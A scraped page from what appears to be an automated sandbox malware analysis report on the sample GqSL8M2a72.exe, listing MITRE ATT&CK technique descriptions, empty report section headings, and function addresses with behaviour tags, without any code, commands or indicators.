Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report GqSL8M2a72

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Sigma Overview

Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Protection of GUI:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Imports

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: GqSL8M2a72.exe PID: 1832 Parent PID: 5716

General

Chronological Activities

Analysis Process: GqSL8M2a72.exe PID: 5864 Parent PID: 1832

General

Function 0042694B, Relevance: 33.5, APIs: 9, Strings: 10, Instructions: 289
nativeprocessthreadCOMMON

Function 004015DA, Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 100
memoryCOMMON

Function 0042658E, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68
nativethreadCOMMON

Function 00401145, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44
memoryencryptionCOMMON

Function 00401326, Relevance: 1.5, APIs: 1, Instructions: 18
memorynativeCOMMON

Function 0042656B, Relevance: 1.5, APIs: 1, Instructions: 12
memorynativeCOMMON

Function 0040135D, Relevance: 49.2, APIs: 19, Strings: 9, Instructions: 168
windowregistryCOMMON

Function 0040156C, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40
windowlibraryCOMMON

Function 00401032, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 108
stringCOMMON

Function 004268FF, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMON

Function 0040101D, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Function 004011B6, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54
libraryloaderCOMMON

Function 00426D37, Relevance: 10.5, APIs: 2, Strings: 5, Instructions: 33
stringCOMMON

Function 00419997, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57
COMMON

Function 0040E97B, Relevance: 42.2, APIs: 15, Strings: 9, Instructions: 229
libraryloadermemoryCOMMON

Function 0040F902, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83
sleepCOMMON

Function 0041A94B, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Function 00411779, Relevance: 82.6, APIs: 27, Strings: 20, Instructions: 389
libraryloaderwindowCOMMON

Function 0040F5BB, Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 243
synchronizationsleepshutdownCOMMON

Function 0040969D, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 188
libraryloaderCOMMON

Function 00406095, Relevance: 18.7, APIs: 12, Instructions: 692
networkCOMMON

Function 00417CCA, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 90
libraryloaderprocessCOMMON

Function 00410F8B, Relevance: 16.4, APIs: 5, Strings: 4, Instructions: 671
synchronizationnetworkCOMMONCrypto

Function 00404C67, Relevance: 15.1, APIs: 10, Instructions: 92
threadCOMMON

Function 00405D60, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109
windowCOMMON

Function 00415E14, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 61
librarystringloaderCOMMON

Function 0041BAD3, Relevance: 10.6, APIs: 7, Instructions: 109
sleepfilesynchronizationCOMMON

Function 00417A74, Relevance: 10.6, APIs: 7, Instructions: 52
threadCOMMON

Function 00415CE5, Relevance: 9.1, APIs: 6, Instructions: 85
threadnativeinjectionCOMMON

Function 0040DB94, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 207
stringCOMMON

Function 00405EC6, Relevance: 7.6, APIs: 5, Instructions: 70
clipboardCOMMON

Function 0041BA18, Relevance: 7.6, APIs: 5, Instructions: 61
fileCOMMON

Function 004120CF, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45
shutdownCOMMON

Function 0041AD03, Relevance: 6.1, APIs: 4, Instructions: 94
memoryinjectionCOMMON

Function 00417A1D, Relevance: 6.0, APIs: 4, Instructions: 36
threadprocessCOMMON

Function 0040E447, Relevance: 3.0, APIs: 2, Instructions: 37
COMMON

Function 004164AA, Relevance: 3.0, APIs: 2, Instructions: 15
timeCOMMON

Function 0040A86D, Relevance: 1.7, APIs: 1, Instructions: 179
comCOMMON

Function 0041D595, Relevance: 1.5, APIs: 1, Instructions: 39
COMMON

Function 004164D2, Relevance: 1.5, APIs: 1, Instructions: 20
timeCOMMON

Function 00401A63, Relevance: .2, Instructions: 236
COMMONCrypto

Function 004190FB, Relevance: .2, Instructions: 190
COMMONCrypto

Function 00417559, Relevance: .1, Instructions: 70
COMMONCrypto

Function 0041CB6F, Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 308
COMMON

Function 00408976, Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 194
COMMON

Function 00407CD9, Relevance: 25.7, APIs: 17, Instructions: 205
filewindowregistryCOMMON

Function 0041534F, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 182
networkCOMMON

Function 00408210, Relevance: 22.6, APIs: 15, Instructions: 132
windowCOMMON

Function 0041A08E, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 52
libraryloadermemoryCOMMON

Function 00413612, Relevance: 19.8, APIs: 9, Strings: 4, Instructions: 254
COMMON

Function 00407F44, Relevance: 18.1, APIs: 12, Instructions: 78
filesynchronizationthreadCOMMON

Function 004132F8, Relevance: 16.7, APIs: 6, Strings: 5, Instructions: 247
COMMON

Function 0041D350, Relevance: 16.6, APIs: 11, Instructions: 118
synchronizationthreadwindowCOMMON

Function 0040D31F, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 274
threadwindowCOMMON

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre